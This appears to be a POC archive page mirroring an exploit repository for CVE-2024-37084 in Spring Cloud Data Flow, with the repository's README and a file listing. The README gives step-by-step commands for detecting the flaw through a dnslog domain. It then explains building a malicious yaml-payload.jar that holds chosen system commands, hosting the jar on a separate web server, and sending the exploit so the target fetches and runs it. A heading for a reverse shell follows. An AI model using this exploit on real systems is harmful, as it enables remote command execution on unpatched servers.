关联漏洞
Description
Spring Cloud Data Flow CVE-2024-37084 exp
介绍
1. Use dnslog to detect whether CVE-2024-37084 vulnerability exists, Then manually check dnslog
`python cve-2024-37084-exp.py -u http://192.168.67.135:7577 -dnslog xxx.dnslog.cn`
2. then you can Execute system commands
**first:** Enter the command you want to execute in src\artsploit\AwesomeScriptEngineFactory.java
**after that:** Double-click the. py file to generate the yaml-payload.jar file.
**after that:** Put yaml-payload.jar on the linux server and start a web service with python. Note: Every time you execute a different command, you need to rename yaml-payload.jar, that is, xx.jar that you access, with a different name every time. Otherwise the new command will not take effect.
The access path is as follows: http://192.168.67.133/yaml-payload.jar.
**finally:** Execute poc
`cve-2024-37084-exp.py -u http://192.168.67.135:7577 -payload http://192.168.67.133/yaml-payload.jar`
Enter the corresponding container to view and successfully execute the command.
**Rebound shell:**
文件快照
[4.0K] /data/pocs/1daf8eff771feaa1430ae1e401e1147483d3cdad
├── [4.8K] cve-2024-37084-exp.py
├── [1.0K] LICENSE
├── [1.5K] README.md
└── [4.0K] yaml-payload-master
├── [ 144] generate-yaml-payload.jar.py
├── [4.0K] src
│ ├── [4.0K] artsploit
│ │ ├── [1.7K] AwesomeScriptEngineFactory.class
│ │ └── [1.7K] AwesomeScriptEngineFactory.java
│ └── [4.0K] META-INF
│ └── [4.0K] services
│ └── [ 36] javax.script.ScriptEngineFactory
└── [2.4K] yaml-payload.jar
5 directories, 8 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →